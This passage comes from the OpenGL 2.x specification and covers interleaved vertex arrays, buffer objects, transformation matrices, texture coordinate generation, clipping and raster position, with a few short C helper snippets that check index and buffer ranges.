efficiently initializes the six arrays and their enables to one of 14 configurations. format must be one of 14 symbolic constants: V2F, V3F, C4UB_V2F, C4UB_V3F, C3F_V3F, N3F_V3F, C4F_N3F_V3F, T2F_V3F, T4F_V4F, T2F_C4UB_V3F, T2F_C3F_V3F, T2F_N3F_V3F, T2F_C4F_N3F_V3F, or T4F_C4F_N3F_V4F.
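The index-range constraint on DrawRangeElements can be expressed as a standalone predicate. This is a hypothetical client-side helper, not a GL entry point; the GL itself reports INVALID_VALUE only for end < start and may not check individual indices.

```c
#include <assert.h>
#include <stddef.h>

/* Sketch: the checks a client might perform before calling
 * DrawRangeElements. Returns 0 if the call is well-formed,
 * 1 if end < start (INVALID_VALUE in the GL), and 2 if some
 * index lies outside [start, end] (implementation-dependent
 * behavior in the GL, which may not check for it). */
int check_range_elements(unsigned start, unsigned end,
                         const unsigned *indices, size_t count) {
    if (end < start) return 1;
    for (size_t i = 0; i < count; i++)
        if (indices[i] < start || indices[i] > end) return 2;
    return 0;
}
```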
The effect of InterleavedArrays(format, stride, pointer) is determined by the values in tables 2.5 and 2.6, where f is the size in basic machine units of a FLOAT and c is 4 times the size of an UNSIGNED_BYTE, rounded up to the nearest multiple of f.

Table 2.5: Variables that direct the execution of InterleavedArrays.

format            et     ec     en     st  sc  sv  tc
V2F               False  False  False  -   -   2   -
V3F               False  False  False  -   -   3   -
C4UB_V2F          False  True   False  -   4   2   UNSIGNED_BYTE
C4UB_V3F          False  True   False  -   4   3   UNSIGNED_BYTE
C3F_V3F           False  True   False  -   3   3   FLOAT
N3F_V3F           False  False  True   -   -   3   -
C4F_N3F_V3F       False  True   True   -   4   3   FLOAT
T2F_V3F           True   False  False  2   -   3   -
T4F_V4F           True   False  False  4   -   4   -
T2F_C4UB_V3F      True   True   False  2   4   3   UNSIGNED_BYTE
T2F_C3F_V3F       True   True   False  2   3   3   FLOAT
T2F_N3F_V3F       True   False  True   2   -   3   -
T2F_C4F_N3F_V3F   True   True   True   2   4   3   FLOAT
T4F_C4F_N3F_V4F   True   True   True   4   4   4   FLOAT

Table 2.6: Byte offsets used by InterleavedArrays.

format            pc    pn    pv      s
V2F               -     -     0       2f
V3F               -     -     0       3f
C4UB_V2F          0     -     c       c + 2f
C4UB_V3F          0     -     c       c + 3f
C3F_V3F           0     -     3f      6f
N3F_V3F           -     0     3f      6f
C4F_N3F_V3F       0     4f    7f      10f
T2F_V3F           -     -     2f      5f
T4F_V4F           -     -     4f      8f
T2F_C4UB_V3F      2f    -     c + 2f  c + 5f
T2F_C3F_V3F       2f    -     5f      8f
T2F_N3F_V3F       -     2f    5f      8f
T2F_C4F_N3F_V3F   2f    6f    9f      12f
T4F_C4F_N3F_V4F   4f    8f    11f     15f

The effect is the same as the effect of the command sequence

    str = stride;
    if (str == 0) str = s;
    DisableClientState(EDGE_FLAG_ARRAY);
    DisableClientState(INDEX_ARRAY);
    DisableClientState(SECONDARY_COLOR_ARRAY);
    DisableClientState(FOG_COORD_ARRAY);
    if (et) {
        EnableClientState(TEXTURE_COORD_ARRAY);
        TexCoordPointer(st, FLOAT, str, pointer);
    } else DisableClientState(TEXTURE_COORD_ARRAY);
    if (ec) {
        EnableClientState(COLOR_ARRAY);
        ColorPointer(sc, tc, str, pointer + pc);
    } else DisableClientState(COLOR_ARRAY);
    if (en) {
        EnableClientState(NORMAL_ARRAY);
        NormalPointer(FLOAT, str, pointer + pn);
    } else DisableClientState(NORMAL_ARRAY);
    EnableClientState(VERTEX_ARRAY);
    VertexPointer(sv, FLOAT, str, pointer + pv);

If the number of supported texture units (the value of MAX_TEXTURE_COORDS) is m and the number of supported generic vertex attributes (the value of MAX_VERTEX_ATTRIBS) is n, then the client state required to implement vertex arrays consists of an integer for the client active texture unit selector, 7 + m + n boolean values, 7 + m + n memory pointers, 7 + m + n integer stride values, 7 + m + n symbolic constants representing array types, 3 + m + n integers representing values per element, and n boolean values indicating normalization. In the initial state, the client active texture unit selector is TEXTURE0, the boolean values are each false, the memory pointers are each NULL, the strides are each zero, the array types are each FLOAT, and the integers representing values per element are each four.

The command

void GenBuffers( sizei n, uint *buffers );

returns n previously unused buffer object names in buffers. These names are marked as used, for the purposes of GenBuffers only, but they acquire buffer state only when they are first bound, just as if they were unused.
While a buffer object is bound, any GL operations on that object affect any other bindings of that object. If a buffer object is deleted while it is bound, all bindings to that object in the current context (i.e. in the thread that called DeleteBuffers) are reset to zero. Bindings to that buffer in other contexts and other threads are not affected, but attempting to use a deleted buffer in another thread produces undefined results, including but not limited to possible GL errors and rendering corruption. Using a deleted buffer in another context or thread may not, however, result in program termination.

The data store of a buffer object is created and initialized by calling

void BufferData( enum target, sizeiptr size, const void *data, enum usage );

with usage specified as one of nine enumerated values, indicating the expected application usage pattern of the data store:

STREAM_DRAW   The data store contents will be specified once by the application, and used at most a few times as the source for GL drawing and image specification commands.

STREAM_READ   The data store contents will be specified once by reading data from the GL, and queried at most a few times by the application.

STREAM_COPY   The data store contents will be specified once by reading data from the GL, and used at most a few times as the source for GL drawing and image specification commands.

STATIC_DRAW   The data store contents will be specified once by the application, and used many times as the source for GL drawing and image specification commands.

STATIC_READ   The data store contents will be specified once by reading data from the GL, and queried many times by the application.

STATIC_COPY   The data store contents will be specified once by reading data from the GL, and used many times as the source for GL drawing and image specification commands.

DYNAMIC_DRAW   The data store contents will be respecified repeatedly by the application, and used many times as the source for GL drawing and image specification commands.
DYNAMIC_READ   The data store contents will be respecified repeatedly by reading data from the GL, and queried many times by the application.

DYNAMIC_COPY   The data store contents will be respecified repeatedly by reading data from the GL, and used many times as the source for GL drawing and image specification commands.

usage is provided as a performance hint only. The specified usage value does not constrain the actual usage pattern of the data store.

BufferData deletes any existing data store, and sets the values of the buffer object's state variables as shown in table 2.7:

Name                 Value
BUFFER_SIZE          size
BUFFER_USAGE         usage
BUFFER_ACCESS        READ_WRITE
BUFFER_MAPPED        FALSE
BUFFER_MAP_POINTER   NULL

Table 2.7: Buffer object state after calling BufferData.

Clients must align data elements consistent with the requirements of the client platform, with an additional base-level requirement that an offset within a buffer to a datum comprising N basic machine units be a multiple of N.

If the GL is unable to create a data store of the requested size, the error OUT_OF_MEMORY is generated.

To modify some or all of the data contained in a buffer object's data store, the client may use the command

void BufferSubData( enum target, intptr offset, sizeiptr size, const void *data );

with target set to ARRAY_BUFFER. offset and size indicate the range of data in the buffer object that is to be replaced, in terms of basic machine units. data specifies a region of client memory size basic machine units in length, containing the data that replace the specified buffer range. An INVALID_VALUE error is generated if offset or size is less than zero, or if offset + size is greater than the value of BUFFER_SIZE.

The entire data store of a buffer object can be mapped into the client's address space by calling

void *MapBuffer( enum target, enum access );

A successful map sets the buffer object state values shown in table 2.8:

Name                 Value
BUFFER_ACCESS        access
BUFFER_MAPPED        TRUE
BUFFER_MAP_POINTER   pointer to the data store

Table 2.8: Buffer object state after calling MapBuffer.

The mapping is relinquished by calling

boolean UnmapBuffer( enum target );

When an array is sourced from a buffer object, the pointer value given to the corresponding *Pointer command is interpreted as an offset, in basic machine units, into the data store of the buffer object. This offset is computed by subtracting a null pointer from the pointer value, where both pointers are treated as pointers to basic machine units.
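The INVALID_VALUE condition for BufferSubData reduces to a simple range check, sketched here as a standalone predicate (an invented helper, not a GL entry point):

```c
#include <assert.h>

/* Sketch: BufferSubData parameters are valid only when offset and size
 * are non-negative and the replaced range fits inside the data store. */
int buffer_sub_data_valid(long long offset, long long size, long long buffer_size) {
    if (offset < 0 || size < 0) return 0;       /* INVALID_VALUE in the GL */
    if (offset + size > buffer_size) return 0;  /* range exceeds BUFFER_SIZE */
    return 1;
}
```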
It is acceptable for vertex or attrib arrays to be sourced from any combination of client memory and various buffer objects during a single rendering operation. Attempts to source data from a currently mapped buffer object will generate an INVALID_OPERATION error.

The state of each buffer object consists of a buffer size in basic machine units, a usage parameter, an access parameter, a mapped boolean, a pointer to the mapped buffer (NULL if unmapped), and the sized array of basic machine units for the buffer data.

2.10 Rectangles

There is a set of GL commands to support efficient specification of rectangles as two corner vertices. Each command takes either four arguments organized as two consecutive pairs of (x, y) coordinates, or two pointers to arrays each of which contains an x value followed by a y value. The effect of the Rect command

Rect(x1, y1, x2, y2);

is the same as the command sequence

Begin(POLYGON);
Vertex2(x1, y1);
Vertex2(x2, y1);
Vertex2(x2, y2);
Vertex2(x1, y2);
End();

Figure 2.6: Vertex transformation sequence. Object coordinates are transformed by the model-view matrix to eye coordinates, by the projection matrix to clip coordinates, by perspective division to normalized device coordinates, and by the viewport transformation to window coordinates.

Figure 2.6 diagrams the sequence of transformations that are applied to vertices. The vertex coordinates that are presented to the GL are termed object coordinates. The model-view matrix is applied to these coordinates to yield eye coordinates. Then another matrix, called the projection matrix, is applied to eye coordinates to yield clip coordinates. A perspective division is carried out on clip coordinates to yield normalized device coordinates. A final viewport transformation is applied to convert these coordinates into window coordinates.

Object coordinates, eye coordinates, and clip coordinates are four-dimensional, consisting of x, y, z, and w coordinates (in that order). The model-view and projection matrices are thus 4 × 4.
If a vertex in object coordinates is given by (xo yo zo wo)^T and the model-view matrix is M, then the vertex's eye coordinates are found as

(xe ye ze we)^T = M (xo yo zo wo)^T.

Similarly, if P is the projection matrix, then the vertex's clip coordinates are

(xc yc zc wc)^T = P (xe ye ze we)^T.

The vertex's normalized device coordinates are then

(xd yd zd)^T = (xc/wc  yc/wc  zc/wc)^T,

and its window coordinates, (xw yw zw)^T, are given by

xw = (px/2) xd + ox
yw = (py/2) yd + oy
zw = [(f − n)/2] zd + (n + f)/2.

The factor and offset applied to zd encoded by n and f are set using

void DepthRange( clampd n, clampd f );

Each of n and f are clamped to lie within [0, 1], as are all arguments of type clampd or clampf. zw is taken to be represented in fixed-point with at least as many bits as there are in the depth buffer of the framebuffer. We assume that the fixed-point representation used represents each value k/(2^m − 1), where k ∈ {0, 1, ..., 2^m − 1}, as k (e.g. 1.0 is represented in binary as a string of all ones).

Viewport transformation parameters are specified using

void Viewport( int x, int y, sizei w, sizei h );

where x and y give the x and y window coordinates of the viewport's lower left corner and w and h give the viewport's width and height, respectively. The viewport parameters shown in the above equations are found from these values as ox = x + w/2 and oy = y + h/2; px = w, py = h.

2.11.2 Matrices

The projection matrix and model-view matrix are set and modified with a variety of commands. The affected matrix is determined by the current matrix mode. The current matrix mode is set with

void MatrixMode( enum mode );

LoadMatrix takes a pointer to a 4 × 4 matrix stored in column-major order as 16 consecutive floating-point values, i.e. as

a1  a5  a9   a13
a2  a6  a10  a14
a3  a7  a11  a15
a4  a8  a12  a16

(This differs from the standard row-major C ordering for matrix elements. If the standard ordering is used, all of the subsequent transformation equations are transposed, and the columns representing vectors become rows.)

The specified matrix replaces the current matrix with the one pointed to. MultMatrix takes the same type argument as LoadMatrix, but multiplies the current matrix by the one pointed to and replaces the current matrix with the product.
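Column-major storage means element (row i, column j) of a 4 × 4 GL matrix lives at index j·4 + i (0-based). A minimal sketch, using an invented helper name, builds a translation matrix in this layout:

```c
#include <assert.h>

/* Sketch: fill m with a translation matrix in GL's column-major layout.
 * The translation column (row 0..2 of column 3) lands at indices 12..14,
 * matching the a13/a14/a15 positions in the layout shown above. */
void load_translation(float m[16], float x, float y, float z) {
    for (int i = 0; i < 16; i++)
        m[i] = (i % 5 == 0) ? 1.0f : 0.0f;   /* identity: diagonal at 0,5,10,15 */
    m[12] = x;   /* row 0, column 3 */
    m[13] = y;   /* row 1, column 3 */
    m[14] = z;   /* row 2, column 3 */
}
```

An array filled this way is in the form expected by LoadMatrixf; the row-major C-style equivalent would instead be passed to LoadTransposeMatrixf.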
If C is the current matrix and M is the matrix pointed to by MultMatrix's argument, then the resulting current matrix, C′, is

C′ = C · M.

The commands

void LoadTransposeMatrix{fd}( T m[16] );
void MultTransposeMatrix{fd}( T m[16] );

take pointers to 4 × 4 matrices stored in row-major order as 16 consecutive floating-point values, i.e. as

a1   a2   a3   a4
a5   a6   a7   a8
a9   a10  a11  a12
a13  a14  a15  a16

The effect of LoadTransposeMatrix[fd](m) is the same as the effect of LoadMatrix[fd](m^T); the effect of MultTransposeMatrix[fd](m) is the same as the effect of MultMatrix[fd](m^T).

The command

void LoadIdentity( void );

effectively calls LoadMatrix with the identity matrix:

1 0 0 0
0 1 0 0
0 0 1 0
0 0 0 1

There are a variety of other commands that manipulate matrices. Rotate, Translate, Scale, Frustum, and Ortho manipulate the current matrix. Each computes a matrix and then invokes MultMatrix with this matrix. In the case of

void Rotate{fd}( T θ, T x, T y, T z );

θ gives an angle of rotation in degrees and (x y z)^T gives a vector v defining the axis of rotation. The computed matrix is

R 0
0 1

with R a 3 × 3 rotation matrix. Let u = v/||v|| = (x′ y′ z′)^T. If

     0    −z′   y′
S =  z′    0   −x′
    −y′    x′   0

then

R = uu^T + cos θ (I − uu^T) + sin θ S.

The arguments to

void Translate{fd}( T x, T y, T z );

give the coordinates of a translation vector. The resulting matrix is

1 0 0 x
0 1 0 y
0 0 1 z
0 0 0 1

void Scale{fd}( T x, T y, T z );

produces a general scaling along the x-, y-, and z-axes. The corresponding matrix is

x 0 0 0
0 y 0 0
0 0 z 0
0 0 0 1

For

void Frustum( double l, double r, double b, double t, double n, double f );

the coordinates (l b −n)^T and (r t −n)^T specify the points on the near clipping plane that are mapped to the lower left and upper right corners of the window, respectively (assuming that the eye is located at (0 0 0)^T). f gives the distance from the eye to the far clipping plane. If either n or f is less than or equal to zero, l is equal to r, b is equal to t, or n is equal to f, the error INVALID_VALUE results. The corresponding matrix is

2n/(r−l)   0          (r+l)/(r−l)    0
0          2n/(t−b)   (t+b)/(t−b)    0
0          0          −(f+n)/(f−n)   −2fn/(f−n)
0          0          −1             0

void Ortho( double l, double r, double b, double t, double n, double f );

describes a matrix that produces parallel projection. The corresponding matrix is

2/(r−l)   0         0          −(r+l)/(r−l)
0         2/(t−b)   0          −(t+b)/(t−b)
0         0         −2/(f−n)   −(f+n)/(f−n)
0         0         0          1

For each texture coordinate set, a 4 × 4 matrix is applied to the corresponding texture coordinates:

m1  m5  m9   m13     s
m2  m6  m10  m14     t
m3  m7  m11  m15     r
m4  m8  m12  m16     q

where the left matrix is the current texture matrix. The matrix is applied to the coordinates resulting from texture coordinate generation (which may simply be the current texture coordinates), and the resulting transformed coordinates become the texture coordinates associated with a vertex. Setting the matrix mode to TEXTURE causes the already described matrix operations to apply to the texture matrix.

The command

void ActiveTexture( enum texture );

specifies the active texture unit selector, ACTIVE_TEXTURE. Each texture unit contains up to two distinct sub-units: a texture coordinate processing unit (consisting of a texture matrix stack and texture coordinate generation state) and a texture image unit (consisting of all the texture state defined in section 3.8). In implementations with a different number of supported texture coordinate sets and texture image units, some texture units may consist of only one of the two sub-units.

The active texture unit selector specifies the texture coordinate set accessed by commands involving texture coordinate processing. Such commands include those accessing the current matrix stack (if MATRIX_MODE is TEXTURE), TexEnv commands controlling point sprite coordinate replacement (see section 3.3), TexGen (section 2.11.4), Enable/Disable (if any texture coordinate generation enum is selected), as well as queries of the current texture coordinates and current raster texture coordinates. If the texture coordinate set number corresponding to the current value of ACTIVE_TEXTURE is greater than or equal to the implementation-dependent constant MAX_TEXTURE_COORDS, the error INVALID_OPERATION is generated by any such command.

The active texture unit selector also selects the texture image unit accessed by commands involving texture image processing (section 3.8).
Such commands include all variants of TexEnv (except for those controlling point sprite coordinate replacement), TexParameter, and TexImage commands, BindTexture, Enable/Disable for any texture target (e.g., TEXTURE_2D), and queries of all such state. If the texture image unit number corresponding to the current value of ACTIVE_TEXTURE is greater than or equal to the implementation-dependent constant MAX_COMBINED_TEXTURE_IMAGE_UNITS, the error INVALID_OPERATION is generated by any such command.

ActiveTexture generates the error INVALID_ENUM if an invalid texture is specified. texture is a symbolic constant of the form TEXTUREi, indicating that texture unit i is to be modified. The constants obey TEXTUREi = TEXTURE0 + i (i is in the range 0 to k − 1, where k is the larger of MAX_TEXTURE_COORDS and MAX_COMBINED_TEXTURE_IMAGE_UNITS).

For backwards compatibility, the implementation-dependent constant MAX_TEXTURE_UNITS specifies the number of conventional texture units supported by the implementation. Its value must be no larger than the minimum of MAX_TEXTURE_COORDS and MAX_COMBINED_TEXTURE_IMAGE_UNITS.

There is a stack of matrices for each of matrix modes MODELVIEW, PROJECTION, and COLOR, and for each texture unit. For MODELVIEW mode, the stack depth is at least 32 (that is, there is a stack of at least 32 model-view matrices). For the other modes, the depth is at least 2. Texture matrix stacks for all texture units have the same depth. The current matrix in any mode is the matrix on the top of the stack for that mode.

The command PushMatrix pushes the stack down by one, duplicating the current matrix in both the top of the stack and the entry below it. PopMatrix pops the top entry off of the stack, replacing the current matrix with the matrix that was the second entry in the stack. The pushing or popping takes place on the stack corresponding to the current matrix mode.
Popping a matrix off a stack with only one entry generates the error STACK_UNDERFLOW; pushing a matrix onto a full stack generates STACK_OVERFLOW. When the current matrix mode is TEXTURE, the texture matrix stack of the active texture unit is pushed or popped.

The state required to implement transformations consists of an integer for the active texture unit selector, a four-valued integer indicating the current matrix mode, one stack of at least two 4 × 4 matrices for each of COLOR, PROJECTION, and each texture coordinate set, TEXTURE; and a stack of at least 32 4 × 4 matrices for MODELVIEW. Each matrix stack has an associated stack pointer. Initially, there is only one matrix on each stack, and all matrices are set to the identity. The initial active texture unit selector is TEXTURE0, and the initial matrix mode is MODELVIEW.

Normal rescaling and normalization are controlled with Enable and Disable with target equal to RESCALE_NORMAL or NORMALIZE. This requires two bits of state. The initial state is for normals not to be rescaled or normalized.

If the model-view matrix is M, then the normal is transformed to eye coordinates by:

(nx′ ny′ nz′ q′) = (nx ny nz q) · M^-1

where, if (x y z w)^T are the associated vertex coordinates, then

q = 0,                           if w = 0,
q = −(nx ny nz)(x y z)^T / w,    if w ≠ 0.    (2.1)

Implementations may choose instead to transform (nx ny nz) to eye coordinates using

(nx′ ny′ nz′) = (nx ny nz) · Mu^-1

where Mu is the upper leftmost 3 × 3 matrix taken from M.

Rescale multiplies the transformed normals by a scale factor

(nx″ ny″ nz″) = f (nx′ ny′ nz′)

If rescaling is disabled, then f = 1. If rescaling is enabled, then f is computed as (mij denotes the matrix element in row i and column j of M^-1, numbering the topmost row of the matrix as row 1 and the leftmost column as column 1)

f = 1 / sqrt(m31^2 + m32^2 + m33^2)

Note that if the normals sent to GL were unit length and the model-view matrix uniformly scales space, then rescale makes the transformed normals unit length.

Alternatively, an implementation may choose f as

f = 1 / sqrt(nx′^2 + ny′^2 + nz′^2)

recomputing f for each normal.
This makes all non-zero length normals unit length regardless of their input length and the nature of the model-view matrix.

After rescaling, the final transformed normal used in lighting, nf, is computed as

nf = m (nx″ ny″ nz″)

If normalization is disabled, then m = 1. Otherwise

m = 1 / sqrt(nx″^2 + ny″^2 + nz″^2)

Because we specify neither the floating-point format nor the means for matrix inversion, we cannot specify behavior in the case of a poorly-conditioned (nearly singular) model-view matrix M. In case of an exactly singular matrix, the transformed normal is undefined. If the GL implementation determines that the model-view matrix is uninvertible, then the entries in the inverted matrix are arbitrary. In any case, neither normal transformation nor use of the transformed normal may lead to GL interruption or termination.

If TEXTURE_GEN_MODE indicates EYE_LINEAR, the generation function uses coefficients

(p1′ p2′ p3′ p4′) = (p1 p2 p3 p4) M^-1

where xe, ye, ze, and we are the eye coordinates of the vertex. p1, ..., p4 are set by calling TexGen with pname set to EYE_PLANE in correspondence with setting the coefficients in the OBJECT_PLANE case. M is the model-view matrix in effect when p1, ..., p4 are specified. Computed texture coordinates may be inaccurate or undefined if M is poorly conditioned or singular.

When used with a suitably constructed texture image, calling TexGen with TEXTURE_GEN_MODE indicating SPHERE_MAP can simulate the reflected image of a spherical environment on a polygon. SPHERE_MAP texture coordinates are generated as follows. Denote the unit vector pointing from the origin to the vertex (in eye coordinates) by u. Denote the current normal, after transformation to eye coordinates, by nf. Let r = (rx ry rz)^T, the reflection vector, be given by

r = u − 2 nf (nf^T u),

and let

m = 2 sqrt(rx^2 + ry^2 + (rz + 1)^2).

Then the value assigned to an s coordinate (the first TexGen argument value is S) is s = rx/m + 1/2; the value assigned to a t coordinate is t = ry/m + 1/2. Calling TexGen with a coord of either R or Q when pname indicates SPHERE_MAP generates the error INVALID_ENUM.
If TEXTURE_GEN_MODE indicates REFLECTION_MAP, compute the reflection vector r as described for the SPHERE_MAP mode. Then the value assigned to an s coordinate is s = rx; the value assigned to a t coordinate is t = ry; and the value assigned to an r coordinate is r = rz. Calling TexGen with a coord of Q when pname indicates REFLECTION_MAP generates the error INVALID_ENUM.

If TEXTURE_GEN_MODE indicates NORMAL_MAP, compute the normal vector nf as described in section 2.11.3. Then the value assigned to an s coordinate is s = nfx; the value assigned to a t coordinate is t = nfy; and the value assigned to an r coordinate is r = nfz (the values nfx, nfy, and nfz are the components of nf). Calling TexGen with a coord of Q when pname indicates NORMAL_MAP generates the error INVALID_ENUM.

A texture coordinate generation function is enabled or disabled using Enable and Disable with an argument of TEXTURE_GEN_S, TEXTURE_GEN_T, TEXTURE_GEN_R, or TEXTURE_GEN_Q (each indicates the corresponding texture coordinate). When enabled, the specified texture coordinate is computed according to the current EYE_LINEAR, OBJECT_LINEAR or SPHERE_MAP specification, depending on the current setting of TEXTURE_GEN_MODE for that coordinate. When disabled, subsequent vertices will take the indicated texture coordinate from the current texture coordinates.

The state required for texture coordinate generation for each texture unit comprises a five-valued integer for each coordinate indicating coordinate generation mode, and a bit for each coordinate to indicate whether texture coordinate generation is enabled or disabled. In addition, four coefficients are required for the four coordinates for each of EYE_LINEAR and OBJECT_LINEAR. The initial state has the texture generation function disabled for all texture coordinates. The initial values of pi for s are all 0 except p1, which is one; for t all the pi are zero except p2, which is 1. The values of pi for r and q are all 0.
These values of pi apply for both the EYE_LINEAR and OBJECT_LINEAR versions. Initially all texture generation modes are EYE_LINEAR.

2.12 Clipping

Primitives are clipped to the clip volume. In clip coordinates, the view volume is defined by

−wc ≤ xc ≤ wc
−wc ≤ yc ≤ wc
−wc ≤ zc ≤ wc.

This view volume may be further restricted by as many as n client-defined clip planes to generate the clip volume. (n is an implementation dependent maximum that must be at least 6.) Each client-defined plane specifies a half-space. The clip volume is the intersection of all such half-spaces with the view volume (if no client-defined clip planes are enabled, the clip volume is the view volume).

A client-defined clip plane is specified with

void ClipPlane( enum p, double eqn[4] );

The value of the first argument, p, is a symbolic constant, CLIP_PLANEi, where i is an integer between 0 and n − 1, indicating one of n client-defined clip planes. eqn is an array of four double-precision floating-point values. These are the coefficients of a plane equation in object coordinates: p1, p2, p3, and p4 (in that order). The inverse of the current model-view matrix is applied to these coefficients, at the time they are specified, yielding

(p1′ p2′ p3′ p4′) = (p1 p2 p3 p4) M^-1

(where M is the current model-view matrix; the resulting plane equation is undefined if M is singular and may be inaccurate if M is poorly-conditioned) to obtain the plane equation coefficients in eye coordinates. All points with eye coordinates (xe ye ze we)^T that satisfy

(p1′ p2′ p3′ p4′) (xe ye ze we)^T ≥ 0

lie in the half-space defined by the plane; points that do not satisfy this condition do not lie in the half-space.

When a vertex shader is active, the vector (xe ye ze we)^T is no longer computed. Instead, the value of the gl_ClipVertex built-in variable is used in its place.
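The half-space condition above is a single dot product, sketched here as a standalone predicate (an invented helper for illustration):

```c
#include <assert.h>

/* Sketch: a point with eye coordinates v = (xe, ye, ze, we) lies in the
 * half-space of the eye-space plane p' = (p1', p2', p3', p4') exactly when
 * the dot product p' . v is non-negative. */
int in_half_space(const double p[4], const double v[4]) {
    double d = p[0]*v[0] + p[1]*v[1] + p[2]*v[2] + p[3]*v[3];
    return d >= 0.0;
}
```

For example, the plane (0, 0, 1, 0) keeps points with ze ≥ 0: the point (0, 0, 2, 1) passes and (0, 0, −2, 1) does not.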
If gl_ClipVertex is not written by the vertex shader, its value is undefined, which implies that the results of clipping to any client-defined clip planes are also undefined. The user must ensure that the clip vertex and client-defined clip planes are defined in the same coordinate space.

Client-defined clip planes are enabled with the generic Enable command and disabled with the Disable command. The value of the argument to either command is CLIP_PLANEi, where i is an integer between 0 and n - 1; specifying a value of i enables or disables the plane equation with index i. The constants obey CLIP_PLANEi = CLIP_PLANE0 + i.

If the primitive under consideration is a point, then clipping passes it unchanged if it lies within the clip volume; otherwise, it is discarded. If the primitive is a line segment, then clipping does nothing to it if it lies entirely within the clip volume and discards it if it lies entirely outside the volume. If part of the line segment lies in the volume and part lies outside, then the line segment is clipped and new vertex coordinates are computed for one or both vertices. A clipped line segment endpoint lies on both the original line segment and the boundary of the clip volume.

This clipping produces a value, 0 <= t <= 1, for each clipped vertex. If the coordinates of a clipped vertex are P and the original vertices' coordinates are P_1 and P_2, then t is given by

    P = t P_1 + (1 - t) P_2.

The value of t is used in color, secondary color, texture coordinate, and fog coordinate clipping (section 2.14.8).

If the primitive is a polygon, then it is passed if every one of its edges lies entirely inside the clip volume, and either clipped or discarded otherwise. Polygon clipping may cause polygon edges to be clipped, but because polygon connectivity must be maintained, these clipped edges are connected by new edges that lie along the clip volume's boundary. Thus, clipping may require the introduction of new vertices into a polygon.
Edge flags are associated with these vertices so that edges introduced by clipping are flagged as boundary (edge flag TRUE), and so that original edges of the polygon that become cut off at these vertices retain their original flags.

If it happens that a polygon intersects an edge of the clip volume's boundary, then the clipped polygon must include a point on this boundary edge. This point must lie in the intersection of the boundary edge and the convex hull of the vertices of the original polygon. We impose this requirement because the polygon may not be exactly planar.

Primitives rendered with clip planes must satisfy a complementarity criterion. Suppose a single clip plane with coefficients ( p'_1  p'_2  p'_3  p'_4 ) (or a number of similarly specified clip planes) is enabled and a series of primitives are drawn. Next, suppose that the original clip plane is respecified with coefficients ( -p'_1  -p'_2  -p'_3  -p'_4 ) (and correspondingly for any other clip planes) and the primitives are drawn again (and the GL is otherwise in the same state). In this case, primitives must not be missing any pixels, nor may any pixels be drawn twice in regions where those primitives are cut by the clip planes.

The state required for clipping is at least 6 sets of plane equations (each consisting of four double-precision floating-point coefficients) and at least 6 corresponding bits indicating which of these client-defined plane equations are enabled. In the initial state, all client-defined plane equation coefficients are zero and all planes are disabled.

Gets of CURRENT_RASTER_TEXTURE_COORDS are affected by the setting of the state ACTIVE_TEXTURE.

The coordinates are treated as if they were specified in a Vertex command. If a vertex shader is active, this vertex shader is executed using the x, y, z, and w coordinates as the object coordinates of the vertex. Otherwise, the x, y, z, and w coordinates are transformed by the current model-view and projection matrices.
These coordinates, along with current values, are used to generate primary and secondary colors and texture coordinates just as is done for a vertex. The colors and texture coordinates so produced replace the colors and texture coordinates stored in the current raster position's associated data. If a vertex shader is active then the current raster distance is set to the value of the shader built-in varying gl_FogFragCoord. Otherwise, if the value of the fog source (see section 3.10) is FOG_COORD, then the current raster distance is set to the value of the current fog coordinate. Otherwise, the current raster distance is set to the distance from the origin of the eye coordinate system to the vertex as transformed by only the current model-view matrix. This distance may be approximated as discussed in section 3.10.

Since vertex shaders may be executed when the raster position is set, any attributes not written by the shader will result in undefined state in the current raster position. Vertex shaders should output all varying variables that would be used when rasterizing pixel primitives using the current raster position.

The transformed coordinates are passed to clipping as if they represented a point. If the "point" is not culled, then the projection to window coordinates is computed (section 2.11) and saved as the current raster position, and the valid bit is set. If the "point" is culled, the current raster position and its associated data become indeterminate and the valid bit is cleared. Figure 2.7 summarizes the behavior of the current raster position.
[Figure 2.7. The current raster position and how it is set. Four texture units are shown; however, multitexturing may support a different number of units depending on the implementation.]

Alternately, the current raster position may be set by one of the WindowPos commands. The window coordinates are computed as

    x_w = x
    y_w = y

          { n,              z <= 0
    z_w = { f,              z >= 1
          { n + z(f - n),   otherwise

    w_c = 1

where n and f are the values passed to DepthRange (see section 2.11.1).

Lighting, texture coordinate generation and transformation, and clipping are not performed by the WindowPos functions. Instead, in RGBA mode, the current raster color and secondary color are obtained by clamping each component of the current color and secondary color, respectively, to [0, 1]. In color index mode, the current raster color index is set to the current color index. The current raster texture coordinates are set to the current texture coordinates, and the valid bit is set.

If the value of the fog source is FOG_COORD, then the current raster distance is set to the value of the current fog coordinate. Otherwise, the raster distance is set to 0.

The current raster position requires six single-precision floating-point values for its x_w, y_w, and z_w window coordinates, its w_c clip coordinate, its raster distance (used as the fog coordinate in raster processing), a single valid bit, four floating-point values to store the current RGBA color, four floating-point values to store the current RGBA secondary color, one floating-point value to store the current color index, and four floating-point values for texture coordinates for each texture unit.
In the initial state, the coordinates and texture coordinates are all (0, 0, 0, 1), the eye coordinate distance is 0, the fog coordinate is 0, the valid bit is set, the associated RGBA color is (1, 1, 1, 1), the associated RGBA secondary color is (0, 0, 0, 1), and the associated color index color is 1. In RGBA mode, the associated color index always has its initial value; in color index mode, the RGBA color and secondary color always maintain their initial values.

[Figure 2.8. Processing of RGBA colors. The heavy dotted lines indicate both primary and secondary vertex colors, which are processed in the same fashion. See table 2.9 for the interpretation of k.]

[Figure 2.9. Processing of color indices. n is the number of bits in a color index.]

    GL Type   Conversion
    ubyte     c / (2^8 - 1)
    byte      (2c + 1) / (2^8 - 1)
    ushort    c / (2^16 - 1)
    short     (2c + 1) / (2^16 - 1)
    uint      c / (2^32 - 1)
    int       (2c + 1) / (2^32 - 1)
    float     c
    double    c

Table 2.9: Component conversions. Color, normal, and depth components, (c), are converted to an internal floating-point representation, (f), using the equations in this table. All arithmetic is done in the internal floating-point format. These conversions apply to components specified as parameters to GL commands and to components in pixel data. The equations remain the same even if the implemented ranges of the GL data types are greater than the minimum required ranges. (Refer to table 2.2.)

Next, lighting, if enabled, produces either a color index or primary and secondary colors. If lighting is disabled, the current color index or current color (primary color) and current secondary color are used in further processing.
After lighting, RGBA colors are clamped to the range [0, 1]. A color index is converted to fixed-point and then its integer portion is masked (see section 2.14.6). After clamping or masking, a primitive may be flatshaded, indicating that all vertices of the primitive are to have the same colors. Finally, if a primitive is clipped, then colors (and texture coordinates) must be computed at the vertices introduced or modified by clipping.

2.14.1 Lighting

